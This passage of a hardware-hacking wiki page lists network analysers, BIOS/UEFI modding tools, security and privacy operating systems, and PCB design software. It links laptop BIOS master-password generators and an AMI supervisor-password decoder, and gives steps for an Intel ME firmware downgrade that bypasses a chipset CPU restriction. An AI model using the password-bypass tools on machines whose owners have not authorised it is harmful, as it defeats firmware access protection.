::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or &amp;quot;sniffer&amp;quot;, for Linux, macOS, &amp;amp;#42;BSD and other Unix and Unix-like operating systems and for Windows.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source &amp;amp; easy to use integrated penetration testing tool for finding vulnerabilities in web applications.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis &amp;amp; modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.&lt;br /&gt;
&lt;br /&gt;
=====HTTP(S) Debuggers / Web Debuggers=====&lt;br /&gt;
&lt;br /&gt;
::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/httptoolkit  HTTP Toolkit] - is a beautiful, cross-platform &amp;amp; open-source HTTP(S) debugging proxy, analyzer &amp;amp; client, with built-in support for modern tools from Docker to Android to GraphQL.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler &amp;amp; Postman together with beautiful, modern UI &amp;amp; collaboration features.&lt;br /&gt;
&lt;br /&gt;
::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.&lt;br /&gt;
&lt;br /&gt;
=====Other Network Tools=====&lt;br /&gt;
&lt;br /&gt;
::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).&lt;br /&gt;
&lt;br /&gt;
::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.&lt;br /&gt;
&lt;br /&gt;
::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====BIOS (basic input/output system) firmware modifying software====&lt;br /&gt;
Unified Extensible Firmware Interface (UEFI) &amp;amp; legacy computer BIOS (basic input/output system) firmware modifying software.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====UEFI=====&lt;br /&gt;
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.&lt;br /&gt;
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.&lt;br /&gt;
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]&lt;br /&gt;
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]&lt;br /&gt;
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o because of SMM protection or variable locking.&lt;br /&gt;
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.&lt;br /&gt;
&lt;br /&gt;
=====BIOS (legacy)=====&lt;br /&gt;
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.&lt;br /&gt;
:::'''AMI'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]&lt;br /&gt;
:::'''Award'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.&lt;br /&gt;
:::'''InsydeH2O'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]&lt;br /&gt;
:::'''Phoenix'''&lt;br /&gt;
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.&lt;br /&gt;
&lt;br /&gt;
:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]&lt;br /&gt;
&lt;br /&gt;
:::'''Tool collections'''&lt;br /&gt;
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.&lt;br /&gt;
&lt;br /&gt;
:::'''Microcode Extraction Tool'''&lt;br /&gt;
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.&lt;br /&gt;
&lt;br /&gt;
:Bios password resetting&lt;br /&gt;
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.&lt;br /&gt;
&lt;br /&gt;
::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).&lt;br /&gt;
&lt;br /&gt;
::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called &amp;quot;AMITSEDecrypt&amp;quot; to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.&lt;br /&gt;
&lt;br /&gt;
::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====HM70 PCH chipset Bypass Unsupported CPU=====&lt;br /&gt;
:Machine shuts down after 30 minutes if a '''&amp;quot;unsupported CPU&amp;quot;''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset.&amp;lt;br&amp;gt;&lt;br /&gt;
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..]&amp;lt;br&amp;gt;&lt;br /&gt;
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.&lt;br /&gt;
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium &amp;amp; Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]&lt;br /&gt;
&lt;br /&gt;
======Intel Management Engine Firmware Downgrade Attack======&lt;br /&gt;
&lt;br /&gt;
::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.&lt;br /&gt;
::Then download the Intel ME version just below the firmware version you try to downgrade.&lt;br /&gt;
::Fire up your hex editor search in your bios blob for '''&amp;quot;0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20&amp;quot;''' Intel ME 1.5M blob will start ascii text '''&amp;quot;$FPT&amp;quot;'''.&lt;br /&gt;
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.&lt;br /&gt;
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.&lt;br /&gt;
&lt;br /&gt;
::This downgrade attack &amp;lt;u&amp;gt;successfully bypassed&amp;lt;/u&amp;gt; the 30 minute shutdown restriction timer.&lt;br /&gt;
&lt;br /&gt;
:'''Required tools''':&lt;br /&gt;
::*[[Software_Tools#Hex_Editors|Hex Editor.]]&lt;br /&gt;
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine &amp;amp; Graphics Firmware Analysis Tool.&lt;br /&gt;
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.&lt;br /&gt;
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.&lt;br /&gt;
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Operating Systems====&lt;br /&gt;
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.&lt;br /&gt;
=====Mostly X86-64=====&lt;br /&gt;
======Penetration Testing &amp;amp; Digital Forensics======&lt;br /&gt;
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.&lt;br /&gt;
&lt;br /&gt;
*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.&lt;br /&gt;
&lt;br /&gt;
*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.&lt;br /&gt;
&lt;br /&gt;
*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.&lt;br /&gt;
&lt;br /&gt;
======RF Signals Analysis OS [RISC SBC &amp;amp; X86-64]======&lt;br /&gt;
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.&lt;br /&gt;
&lt;br /&gt;
======Privacy Operating System======&lt;br /&gt;
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.&lt;br /&gt;
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.&lt;br /&gt;
&lt;br /&gt;
======Windows 10 IoT LTSC======&lt;br /&gt;
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat &amp;amp; setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032. &lt;br /&gt;
&lt;br /&gt;
*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.&lt;br /&gt;
&lt;br /&gt;
======Previous Windows versions======&lt;br /&gt;
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.&lt;br /&gt;
&lt;br /&gt;
=====Embedded Devices [Network equipment]=====&lt;br /&gt;
&lt;br /&gt;
*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.&lt;br /&gt;
&lt;br /&gt;
*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.&lt;br /&gt;
&lt;br /&gt;
*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.&lt;br /&gt;
&lt;br /&gt;
=====Smartphones [Android &amp;quot;de-google&amp;quot;]=====&lt;br /&gt;
&lt;br /&gt;
*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.&lt;br /&gt;
&lt;br /&gt;
*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.&lt;br /&gt;
&lt;br /&gt;
*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.&lt;br /&gt;
&lt;br /&gt;
*[https://calyxos.org/ CalyxOS] - is a privacy-focused, &amp;quot;de-googled&amp;quot; Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.&lt;br /&gt;
&lt;br /&gt;
*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.&lt;br /&gt;
&lt;br /&gt;
*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Tools for opening CAD or Boardview files====&lt;br /&gt;
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.&lt;br /&gt;
&lt;br /&gt;
*[https://pldaniels.com/flexbv5/ FlexBV]  - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards&lt;br /&gt;
&lt;br /&gt;
*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the &amp;quot;Test_Link&amp;quot; software and &amp;quot;Landrex&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.&lt;br /&gt;
&lt;br /&gt;
*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.&lt;br /&gt;
&lt;br /&gt;
*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]&lt;br /&gt;
&lt;br /&gt;
For resources to open in your favorite boardview program visit &lt;br /&gt;
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -&amp;gt; Datasheets boardviews &amp;amp; schematics]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Custom PCB Development Software====&lt;br /&gt;
&lt;br /&gt;
=====Definition and Purpose=====&lt;br /&gt;
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.&lt;br /&gt;
&lt;br /&gt;
::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.&lt;br /&gt;
&lt;br /&gt;
::'''Integration Between CAD and EDA'''&lt;br /&gt;
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.&lt;br /&gt;
&lt;br /&gt;
=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.&lt;br /&gt;
&lt;br /&gt;
*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].&lt;br /&gt;
&lt;br /&gt;
*[https://fritzing.org/ Fritzing] -  is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.&lt;br /&gt;
&lt;br /&gt;
*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.&lt;br /&gt;
&lt;br /&gt;
*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.&lt;br /&gt;
&lt;br /&gt;
